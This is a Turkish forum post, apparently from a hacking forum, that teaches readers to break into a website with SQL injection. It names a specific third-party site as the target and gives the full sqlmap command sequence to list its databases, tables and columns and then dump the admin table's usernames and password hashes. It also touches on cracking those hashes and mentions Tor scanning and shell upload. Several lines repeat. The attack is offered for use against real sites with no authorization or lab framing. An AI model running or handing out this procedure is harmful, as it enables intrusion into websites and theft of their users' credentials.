Merhaba, arkadaşlar bu konumda sizlere sql açıklı sitetyi hacklemeyi göstereceğim,
ben bir tane sql açıklı site buldum şu şekilde :
ben bir tane sql açıklı site buldum şu şekilde :
ilk öncelikle sql açıklı siteyi kopyalıyoruz ve terminalimizi açıp şu komuyu yazıyoruz.
:
Tabiki, sqlmap sadece böyle çalışmıyo örneğin bir çok paremetresi var, biz sadece --dbs en basit şeklinde kullanıyoruz ilerki konularda --risk --tehlike --tor ağında tarama --shell yükleme gibi fazlası var bunlarıda zamanla gösterebilirim, sqlmap python dilinde yazılmış bir araçtır dediğim gibi bir çok taraması var.
Ekrandaki kod şu şekilde :
Kod:
sqlmap -u "httpt://www.kbccp.org/hot_events.php?id =3" --dbs
Bu kodu yazdıktan sonra Enter,
butonumuza basıyoruz bize bazı sorular sorucaktır onlara Enter, Enter deyip devam diyelim cevabı bizim yerine verecektir.
butonumuza basıyoruz bize bazı sorular sorucaktır onlara Enter, Enter deyip devam diyelim cevabı bizim yerine verecektir.
Evet arkadaşlar soru dediğim bunlar Bunlara Enter, Enter diyerek geçelim zaten bize gerekli cevabı verecektir. 
bu işlemden sonra tarama işlemini bitirmesini bekliyoruz.
bu işlemden sonra tarama işlemini bitirmesini bekliyoruz.
Evet arkadaşlar şimdi bu siteye girdi ve bu tablolar var dedi : onları ekran görüntüsünde gösterdim :
Evet yön tuşlarında olan yukarı ok tuşuna basıyoruz ve aşağıda olan kodu uyguluyoruz.
Kod:
sqlmap -u sql açıklı siteniz -D tablo adınız --tables
Evet arkadaşlar ekranda gördüğünüz gibi bize tabloları çıkarttı ve Bir hacker olarak "Admin" tablosunu buldu. 
Şimdi yapacağmız işlem
Kod:
sqlmap -u sql açıklı siteniz -D Tablo Adı -T Colonun adı --columns
Ve Bize Kolonları çekicek.
Evet arkadaşlar bize password,usernama ve daha fazla columns çekti. 
Şimdi yapacağımız şeyi ekranda gösterdim.
Kod:
sqlmap -u sql açıklı siteniz -D Tablo Adı -T Colonun adı -C columns adları --dump
Ediyoruz ve bize gerekli bilgileri çekiyor.
ve gördüğünüz gibi bize bilgileri dump etti.
ve gördüğünüz gibi bize bilgileri dump etti.
Ancak güvenlik nedeniyle şifrelenmiş genellikle MD5 olur ama bu başka bir şifreleme türü bu şifreleme türlerini bularak sizde gerçek bilgilere ulaşabilirsiniz bazılarında güvensizlik nediyle şifrelenmiiyor ama bu şifreli çıktı
konu, burda bitmiştir arkadaşlar
iyi forumlar dilerim...
konu, burda bitmiştir arkadaşlar
iyi forumlar dilerim...
Moderatör tarafında düzenlendi:





